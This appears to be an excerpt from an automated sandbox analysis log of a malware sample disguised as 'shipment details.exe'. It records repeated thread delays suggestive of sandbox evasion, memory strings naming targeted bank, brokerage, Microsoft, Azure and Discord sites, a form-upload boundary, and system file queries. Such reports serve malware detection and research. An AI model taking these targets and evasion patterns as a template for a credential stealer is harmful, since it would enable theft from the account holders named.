Source: C:\Users\user\Desktop\shipment details.exe |
Thread delayed: delay time: 599562 |
Source: C:\Users\user\Desktop\shipment details.exe |
Thread delayed: delay time: 599453 |
Source: C:\Users\user\Desktop\shipment details.exe |
Thread delayed: delay time: 599343 |
Source: C:\Users\user\Desktop\shipment details.exe |
Thread delayed: delay time: 599224 |
Source: C:\Users\user\Desktop\shipment details.exe |
Thread delayed: delay time: 599109 |
Source: C:\Users\user\Desktop\shipment details.exe |
Thread delayed: delay time: 598968 |
Source: C:\Users\user\Desktop\shipment details.exe |
Thread delayed: delay time: 598856 |
Source: C:\Users\user\Desktop\shipment details.exe |
Thread delayed: delay time: 598732 |
Source: C:\Users\user\Desktop\shipment details.exe |
Thread delayed: delay time: 598625 |
Source: C:\Users\user\Desktop\shipment details.exe |
Thread delayed: delay time: 598515 |
Source: C:\Users\user\Desktop\shipment details.exe |
Thread delayed: delay time: 598406 |
Source: C:\Users\user\Desktop\shipment details.exe |
Thread delayed: delay time: 598297 |
Source: C:\Users\user\Desktop\shipment details.exe |
Thread delayed: delay time: 598187 |
Source: C:\Users\user\Desktop\shipment details.exe |
Thread delayed: delay time: 598078 |
Source: C:\Users\user\Desktop\shipment details.exe |
Thread delayed: delay time: 597968 |
Source: C:\Users\user\Desktop\shipment details.exe |
Thread delayed: delay time: 597859 |
Source: C:\Users\user\Desktop\shipment details.exe |
Thread delayed: delay time: 597745 |
Source: C:\Users\user\Desktop\shipment details.exe |
Thread delayed: delay time: 597640 |
Source: C:\Users\user\Desktop\shipment details.exe |
Thread delayed: delay time: 597531 |
Source: C:\Users\user\Desktop\shipment details.exe |
Thread delayed: delay time: 597415 |
Source: C:\Users\user\Desktop\shipment details.exe |
Thread delayed: delay time: 597312 |
Source: C:\Users\user\Desktop\shipment details.exe |
Thread delayed: delay time: 597203 |
Source: C:\Users\user\Desktop\shipment details.exe |
Thread delayed: delay time: 597093 |
Source: C:\Users\user\Desktop\shipment details.exe |
Thread delayed: delay time: 596984 |
Source: C:\Users\user\Desktop\shipment details.exe |
Thread delayed: delay time: 596875 |
Source: C:\Users\user\Desktop\shipment details.exe |
Thread delayed: delay time: 596765 |
Source: C:\Users\user\Desktop\shipment details.exe |
Thread delayed: delay time: 596656 |
Source: C:\Users\user\Desktop\shipment details.exe |
Thread delayed: delay time: 596546 |
Source: C:\Users\user\Desktop\shipment details.exe |
Thread delayed: delay time: 596437 |
Source: C:\Users\user\Desktop\shipment details.exe |
Thread delayed: delay time: 596326 |
Source: C:\Users\user\Desktop\shipment details.exe |
Thread delayed: delay time: 596218 |
Source: C:\Users\user\Desktop\shipment details.exe |
Thread delayed: delay time: 596109 |
Source: C:\Users\user\Desktop\shipment details.exe |
Thread delayed: delay time: 596000 |
Source: C:\Users\user\Desktop\shipment details.exe |
Thread delayed: delay time: 595890 |
Source: C:\Users\user\Desktop\shipment details.exe |
Thread delayed: delay time: 595781 |
Source: C:\Users\user\Desktop\shipment details.exe |
Thread delayed: delay time: 595672 |
Source: C:\Users\user\Desktop\shipment details.exe |
Thread delayed: delay time: 595562 |
Source: C:\Users\user\Desktop\shipment details.exe |
Thread delayed: delay time: 595453 |
Source: C:\Users\user\Desktop\shipment details.exe |
Thread delayed: delay time: 595343 |
Source: C:\Users\user\Desktop\shipment details.exe |
Thread delayed: delay time: 595234 |
Source: C:\Users\user\Desktop\shipment details.exe |
Thread delayed: delay time: 595125 |
Source: C:\Users\user\Desktop\shipment details.exe |
Thread delayed: delay time: 595015 |
Source: C:\Users\user\Desktop\shipment details.exe |
Thread delayed: delay time: 594906 |
Source: C:\Users\user\Desktop\shipment details.exe |
Thread delayed: delay time: 594797 |
Source: C:\Users\user\Desktop\shipment details.exe |
Thread delayed: delay time: 594687 |
Source: C:\Users\user\Desktop\shipment details.exe |
Thread delayed: delay time: 594578 |
Source: C:\Users\user\Desktop\shipment details.exe TID: 6220 |
Thread sleep count: 32 > 30 |
Source: C:\Users\user\Desktop\shipment details.exe TID: 6220 |
Thread sleep time: -29514790517935264s >= -30000s |
Source: C:\Users\user\Desktop\shipment details.exe TID: 6220 |
Thread sleep time: -600000s >= -30000s |
Source: C:\Users\user\Desktop\shipment details.exe TID: 6220 |
Thread sleep time: -599890s >= -30000s |
Source: C:\Users\user\Desktop\shipment details.exe TID: 2672 |
Thread sleep count: 2008 > 30 |
Source: C:\Users\user\Desktop\shipment details.exe TID: 2672 |
Thread sleep count: 7806 > 30 |
Source: C:\Users\user\Desktop\shipment details.exe TID: 6220 |
Thread sleep time: -599781s >= -30000s |
Source: C:\Users\user\Desktop\shipment details.exe TID: 6220 |
Thread sleep time: -599672s >= -30000s |
Source: C:\Users\user\Desktop\shipment details.exe TID: 6220 |
Thread sleep time: -599562s >= -30000s |
Source: C:\Users\user\Desktop\shipment details.exe TID: 6220 |
Thread sleep time: -599453s >= -30000s |
Source: C:\Users\user\Desktop\shipment details.exe TID: 6220 |
Thread sleep time: -599343s >= -30000s |
Source: C:\Users\user\Desktop\shipment details.exe TID: 6220 |
Thread sleep time: -599224s >= -30000s |
Source: C:\Users\user\Desktop\shipment details.exe TID: 6220 |
Thread sleep time: -599109s >= -30000s |
Source: C:\Users\user\Desktop\shipment details.exe TID: 6220 |
Thread sleep time: -598968s >= -30000s |
Source: C:\Users\user\Desktop\shipment details.exe TID: 6220 |
Thread sleep time: -598856s >= -30000s |
Source: C:\Users\user\Desktop\shipment details.exe TID: 6220 |
Thread sleep time: -598732s >= -30000s |
Source: C:\Users\user\Desktop\shipment details.exe TID: 6220 |
Thread sleep time: -598625s >= -30000s |
Source: C:\Users\user\Desktop\shipment details.exe TID: 6220 |
Thread sleep time: -598515s >= -30000s |
Source: C:\Users\user\Desktop\shipment details.exe TID: 6220 |
Thread sleep time: -598406s >= -30000s |
Source: C:\Users\user\Desktop\shipment details.exe TID: 6220 |
Thread sleep time: -598297s >= -30000s |
Source: C:\Users\user\Desktop\shipment details.exe TID: 6220 |
Thread sleep time: -598187s >= -30000s |
Source: C:\Users\user\Desktop\shipment details.exe TID: 6220 |
Thread sleep time: -598078s >= -30000s |
Source: C:\Users\user\Desktop\shipment details.exe TID: 6220 |
Thread sleep time: -597968s >= -30000s |
Source: C:\Users\user\Desktop\shipment details.exe TID: 6220 |
Thread sleep time: -597859s >= -30000s |
Source: C:\Users\user\Desktop\shipment details.exe TID: 6220 |
Thread sleep time: -597745s >= -30000s |
Source: C:\Users\user\Desktop\shipment details.exe TID: 6220 |
Thread sleep time: -597640s >= -30000s |
Source: C:\Users\user\Desktop\shipment details.exe TID: 6220 |
Thread sleep time: -597531s >= -30000s |
Source: C:\Users\user\Desktop\shipment details.exe TID: 6220 |
Thread sleep time: -597415s >= -30000s |
Source: C:\Users\user\Desktop\shipment details.exe TID: 6220 |
Thread sleep time: -597312s >= -30000s |
Source: C:\Users\user\Desktop\shipment details.exe TID: 6220 |
Thread sleep time: -597203s >= -30000s |
Source: C:\Users\user\Desktop\shipment details.exe TID: 6220 |
Thread sleep time: -597093s >= -30000s |
Source: C:\Users\user\Desktop\shipment details.exe TID: 6220 |
Thread sleep time: -596984s >= -30000s |
Source: C:\Users\user\Desktop\shipment details.exe TID: 6220 |
Thread sleep time: -596875s >= -30000s |
Source: C:\Users\user\Desktop\shipment details.exe TID: 6220 |
Thread sleep time: -596765s >= -30000s |
Source: C:\Users\user\Desktop\shipment details.exe TID: 6220 |
Thread sleep time: -596656s >= -30000s |
Source: C:\Users\user\Desktop\shipment details.exe TID: 6220 |
Thread sleep time: -596546s >= -30000s |
Source: C:\Users\user\Desktop\shipment details.exe TID: 6220 |
Thread sleep time: -596437s >= -30000s |
Source: C:\Users\user\Desktop\shipment details.exe TID: 6220 |
Thread sleep time: -596326s >= -30000s |
Source: C:\Users\user\Desktop\shipment details.exe TID: 6220 |
Thread sleep time: -596218s >= -30000s |
Source: C:\Users\user\Desktop\shipment details.exe TID: 6220 |
Thread sleep time: -596109s >= -30000s |
Source: C:\Users\user\Desktop\shipment details.exe TID: 6220 |
Thread sleep time: -596000s >= -30000s |
Source: C:\Users\user\Desktop\shipment details.exe TID: 6220 |
Thread sleep time: -595890s >= -30000s |
Source: C:\Users\user\Desktop\shipment details.exe TID: 6220 |
Thread sleep time: -595781s >= -30000s |
Source: C:\Users\user\Desktop\shipment details.exe TID: 6220 |
Thread sleep time: -595672s >= -30000s |
Source: C:\Users\user\Desktop\shipment details.exe TID: 6220 |
Thread sleep time: -595562s >= -30000s |
Source: C:\Users\user\Desktop\shipment details.exe TID: 6220 |
Thread sleep time: -595453s >= -30000s |
Source: C:\Users\user\Desktop\shipment details.exe TID: 6220 |
Thread sleep time: -595343s >= -30000s |
Source: C:\Users\user\Desktop\shipment details.exe TID: 6220 |
Thread sleep time: -595234s >= -30000s |
Source: C:\Users\user\Desktop\shipment details.exe TID: 6220 |
Thread sleep time: -595125s >= -30000s |
Source: C:\Users\user\Desktop\shipment details.exe TID: 6220 |
Thread sleep time: -595015s >= -30000s |
Source: C:\Users\user\Desktop\shipment details.exe TID: 6220 |
Thread sleep time: -594906s >= -30000s |
Source: C:\Users\user\Desktop\shipment details.exe TID: 6220 |
Thread sleep time: -594797s >= -30000s |
Source: C:\Users\user\Desktop\shipment details.exe TID: 6220 |
Thread sleep time: -594687s >= -30000s |
Source: C:\Users\user\Desktop\shipment details.exe TID: 6220 |
Thread sleep time: -594578s >= -30000s |
Source: C:\Users\user\Desktop\shipment details.exe |
Thread delayed: delay time: 922337203685477 |
Source: C:\Users\user\Desktop\shipment details.exe |
Thread delayed: delay time: 600000 |
Source: C:\Users\user\Desktop\shipment details.exe |
Thread delayed: delay time: 599890 |
Source: C:\Users\user\Desktop\shipment details.exe |
Thread delayed: delay time: 599781 |
Source: C:\Users\user\Desktop\shipment details.exe |
Thread delayed: delay time: 599672 |
Source: C:\Users\user\Desktop\shipment details.exe |
Thread delayed: delay time: 599562 |
Source: C:\Users\user\Desktop\shipment details.exe |
Thread delayed: delay time: 599453 |
Source: C:\Users\user\Desktop\shipment details.exe |
Thread delayed: delay time: 599343 |
Source: C:\Users\user\Desktop\shipment details.exe |
Thread delayed: delay time: 599224 |
Source: C:\Users\user\Desktop\shipment details.exe |
Thread delayed: delay time: 599109 |
Source: C:\Users\user\Desktop\shipment details.exe |
Thread delayed: delay time: 598968 |
Source: C:\Users\user\Desktop\shipment details.exe |
Thread delayed: delay time: 598856 |
Source: C:\Users\user\Desktop\shipment details.exe |
Thread delayed: delay time: 598732 |
Source: C:\Users\user\Desktop\shipment details.exe |
Thread delayed: delay time: 598625 |
Source: C:\Users\user\Desktop\shipment details.exe |
Thread delayed: delay time: 598515 |
Source: C:\Users\user\Desktop\shipment details.exe |
Thread delayed: delay time: 598406 |
Source: C:\Users\user\Desktop\shipment details.exe |
Thread delayed: delay time: 598297 |
Source: C:\Users\user\Desktop\shipment details.exe |
Thread delayed: delay time: 598187 |
Source: C:\Users\user\Desktop\shipment details.exe |
Thread delayed: delay time: 598078 |
Source: C:\Users\user\Desktop\shipment details.exe |
Thread delayed: delay time: 597968 |
Source: C:\Users\user\Desktop\shipment details.exe |
Thread delayed: delay time: 597859 |
Source: C:\Users\user\Desktop\shipment details.exe |
Thread delayed: delay time: 597745 |
Source: C:\Users\user\Desktop\shipment details.exe |
Thread delayed: delay time: 597640 |
Source: C:\Users\user\Desktop\shipment details.exe |
Thread delayed: delay time: 597531 |
Source: C:\Users\user\Desktop\shipment details.exe |
Thread delayed: delay time: 597415 |
Source: C:\Users\user\Desktop\shipment details.exe |
Thread delayed: delay time: 597312 |
Source: C:\Users\user\Desktop\shipment details.exe |
Thread delayed: delay time: 597203 |
Source: C:\Users\user\Desktop\shipment details.exe |
Thread delayed: delay time: 597093 |
Source: C:\Users\user\Desktop\shipment details.exe |
Thread delayed: delay time: 596984 |
Source: C:\Users\user\Desktop\shipment details.exe |
Thread delayed: delay time: 596875 |
Source: C:\Users\user\Desktop\shipment details.exe |
Thread delayed: delay time: 596765 |
Source: C:\Users\user\Desktop\shipment details.exe |
Thread delayed: delay time: 596656 |
Source: C:\Users\user\Desktop\shipment details.exe |
Thread delayed: delay time: 596546 |
Source: C:\Users\user\Desktop\shipment details.exe |
Thread delayed: delay time: 596437 |
Source: C:\Users\user\Desktop\shipment details.exe |
Thread delayed: delay time: 596326 |
Source: C:\Users\user\Desktop\shipment details.exe |
Thread delayed: delay time: 596218 |
Source: C:\Users\user\Desktop\shipment details.exe |
Thread delayed: delay time: 596109 |
Source: C:\Users\user\Desktop\shipment details.exe |
Thread delayed: delay time: 596000 |
Source: C:\Users\user\Desktop\shipment details.exe |
Thread delayed: delay time: 595890 |
Source: C:\Users\user\Desktop\shipment details.exe |
Thread delayed: delay time: 595781 |
Source: C:\Users\user\Desktop\shipment details.exe |
Thread delayed: delay time: 595672 |
Source: C:\Users\user\Desktop\shipment details.exe |
Thread delayed: delay time: 595562 |
Source: C:\Users\user\Desktop\shipment details.exe |
Thread delayed: delay time: 595453 |
Source: C:\Users\user\Desktop\shipment details.exe |
Thread delayed: delay time: 595343 |
Source: C:\Users\user\Desktop\shipment details.exe |
Thread delayed: delay time: 595234 |
Source: C:\Users\user\Desktop\shipment details.exe |
Thread delayed: delay time: 595125 |
Source: C:\Users\user\Desktop\shipment details.exe |
Thread delayed: delay time: 595015 |
Source: C:\Users\user\Desktop\shipment details.exe |
Thread delayed: delay time: 594906 |
Source: C:\Users\user\Desktop\shipment details.exe |
Thread delayed: delay time: 594797 |
Source: C:\Users\user\Desktop\shipment details.exe |
Thread delayed: delay time: 594687 |
Source: C:\Users\user\Desktop\shipment details.exe |
Thread delayed: delay time: 594578 |
Source: shipment details.exe, 00000001.00000002.4523597772.0000000004153000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: Interactive Brokers - HKVMware20,11696428655] |
Source: shipment details.exe, 00000001.00000002.4523597772.0000000004153000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n |
Source: shipment details.exe, 00000001.00000002.4523597772.0000000004153000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: ms.portal.azure.comVMware20,11696428655 |
Source: shipment details.exe, 00000001.00000002.4523597772.0000000003E34000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: interactivebrokers.co.inVMware20,11696428655d |
Source: shipment details.exe, 00000001.00000002.4523597772.0000000003E34000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655 |
Source: shipment details.exe, 00000001.00000002.4523597772.0000000003E34000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: global block list test formVMware20,11696428655 |
Source: shipment details.exe, 00000001.00000002.4523597772.0000000003E34000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: account.microsoft.com/profileVMware20,11696428655u |
Source: shipment details.exe, 00000001.00000002.4523597772.0000000004153000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: global block list test formVMware20,11696428655 |
Source: shipment details.exe, 00000001.00000002.4523597772.0000000004153000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655 |
Source: shipment details.exe, 00000001.00000002.4523597772.0000000003E34000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p |
Source: shipment details.exe, 00000001.00000002.4523597772.0000000004153000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: secure.bankofamerica.comVMware20,11696428655|UE |
Source: shipment details.exe, 00000001.00000002.4523597772.0000000004153000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x |
Source: shipment details.exe, 00000001.00000002.4523597772.0000000003E34000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: AMC password management pageVMware20,11696428655 |
Source: shipment details.exe, 00000001.00000002.4523597772.0000000003E34000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: tasks.office.comVMware20,11696428655o |
Source: shipment details.exe, 00000001.00000002.4523597772.0000000003E34000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: turbotax.intuit.comVMware20,11696428655t |
Source: shipment details.exe, 00000001.00000002.4523597772.0000000003E34000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: interactivebrokers.comVMware20,11696428655 |
Source: shipment details.exe, 00000001.00000002.4523597772.0000000004153000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655 |
Source: shipment details.exe, 00000001.00000002.4523597772.0000000003E34000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655 |
Source: shipment details.exe, 00000001.00000002.4523597772.0000000003E34000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: Interactive Brokers - HKVMware20,11696428655] |
Source: shipment details.exe, 00000001.00000002.4523597772.0000000004153000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655 |
Source: shipment details.exe, 00000001.00000002.4523597772.0000000004153000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: interactivebrokers.co.inVMware20,11696428655d |
Source: shipment details.exe, 00000001.00000002.4523597772.0000000003E34000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: bankofamerica.comVMware20,11696428655x |
Source: shipment details.exe, 00000001.00000002.4523597772.0000000004153000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: netportal.hdfcbank.comVMware20,11696428655 |
Source: shipment details.exe, 00000001.00000002.4523597772.0000000003E34000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655 |
Source: shipment details.exe, 00000001.00000002.4520239872.0000000002F1D000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: $]qEmultipart/form-data; boundary=------------------------8dce87960e4dfa2< |
Source: shipment details.exe, 00000001.00000002.4523597772.0000000003E34000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: Canara Transaction PasswordVMware20,11696428655x |
Source: shipment details.exe, 00000001.00000002.4523597772.0000000004153000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655 |
Source: shipment details.exe, 00000001.00000002.4523597772.0000000003E34000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: discord.comVMware20,11696428655f |
Source: shipment details.exe, 00000001.00000002.4523597772.0000000004153000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: turbotax.intuit.comVMware20,11696428655t |
Source: shipment details.exe, 00000001.00000002.4523597772.0000000003E34000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: Canara Transaction PasswordVMware20,11696428655} |
Source: shipment details.exe, 00000001.00000002.4523597772.0000000004153000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: outlook.office365.comVMware20,11696428655t |
Source: shipment details.exe, 00000001.00000002.4523597772.0000000004153000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: account.microsoft.com/profileVMware20,11696428655u |
Source: shipment details.exe, 00000001.00000002.4523597772.0000000004153000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: Canara Transaction PasswordVMware20,11696428655} |
Source: shipment details.exe, 00000001.00000002.4523597772.0000000003E34000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655 |
Source: shipment details.exe, 00000001.00000002.4523597772.0000000004153000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: dev.azure.comVMware20,11696428655j |
Source: shipment details.exe, 00000001.00000002.4523597772.0000000003E34000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^ |
Source: shipment details.exe, 00000001.00000002.4523597772.0000000004153000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: www.interactivebrokers.comVMware20,11696428655} |
Source: shipment details.exe, 00000001.00000002.4523597772.0000000003E34000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: secure.bankofamerica.comVMware20,11696428655|UE |
Source: shipment details.exe, 00000001.00000002.4523597772.0000000003E34000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: www.interactivebrokers.comVMware20,11696428655} |
Source: shipment details.exe, 00000001.00000002.4523597772.0000000003E34000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n |
Source: shipment details.exe, 00000001.00000002.4523597772.0000000003E34000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: outlook.office365.comVMware20,11696428655t |
Source: shipment details.exe, 00000001.00000002.4523597772.0000000003E34000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x |
Source: shipment details.exe, 00000001.00000002.4518709296.0000000001126000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll |
Source: shipment details.exe, 00000001.00000002.4523597772.0000000003E34000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655 |
Source: shipment details.exe, 00000001.00000002.4523597772.0000000003E34000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: outlook.office.comVMware20,11696428655s |
Source: shipment details.exe, 00000001.00000002.4523597772.0000000004153000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: Canara Transaction PasswordVMware20,11696428655x |
Source: shipment details.exe, 00000001.00000002.4523597772.0000000003E34000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~ |
Source: shipment details.exe, 00000001.00000002.4523597772.0000000003E34000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: ms.portal.azure.comVMware20,11696428655 |
Source: shipment details.exe, 00000001.00000002.4523597772.0000000004153000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: discord.comVMware20,11696428655f |
Source: shipment details.exe, 00000001.00000002.4523597772.0000000004153000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: outlook.office.comVMware20,11696428655s |
Source: shipment details.exe, 00000001.00000002.4523597772.0000000003E34000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z |
Source: shipment details.exe, 00000001.00000002.4523597772.0000000004153000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: tasks.office.comVMware20,11696428655o |
Source: shipment details.exe, 00000001.00000002.4523597772.0000000003E34000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: dev.azure.comVMware20,11696428655j |
Source: shipment details.exe, 00000001.00000002.4523597772.0000000003E34000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: netportal.hdfcbank.comVMware20,11696428655 |
Source: shipment details.exe, 00000001.00000002.4523597772.0000000004153000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^ |
Source: shipment details.exe, 00000001.00000002.4523597772.0000000004153000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: AMC password management pageVMware20,11696428655 |
Source: shipment details.exe, 00000001.00000002.4523597772.0000000004153000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p |
Source: shipment details.exe, 00000001.00000002.4523597772.0000000004153000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655 |
Source: shipment details.exe, 00000001.00000002.4523597772.0000000004153000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: interactivebrokers.comVMware20,11696428655 |
Source: shipment details.exe, 00000001.00000002.4523597772.0000000004153000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~ |
Source: shipment details.exe, 00000001.00000002.4523597772.0000000004153000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h |
Source: shipment details.exe, 00000001.00000002.4523597772.0000000004153000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z |
Source: shipment details.exe, 00000001.00000002.4523597772.0000000003E34000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h |
Source: shipment details.exe, 00000001.00000002.4523597772.0000000004153000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: bankofamerica.comVMware20,11696428655x |
Source: C:\Users\user\Desktop\shipment details.exe |
Queries volume information: C:\Users\user\Desktop\shipment details.exe VolumeInformation |
Source: C:\Users\user\Desktop\shipment details.exe |
Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation |
Source: C:\Users\user\Desktop\shipment details.exe |
Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation |
Source: C:\Users\user\Desktop\shipment details.exe |
Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation |
Source: C:\Users\user\Desktop\shipment details.exe |
Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation |
Source: C:\Users\user\Desktop\shipment details.exe |
Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation |
Source: C:\Users\user\Desktop\shipment details.exe |
Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation |
Source: C:\Users\user\Desktop\shipment details.exe |
Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation |
Source: C:\Users\user\Desktop\shipment details.exe |
Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation |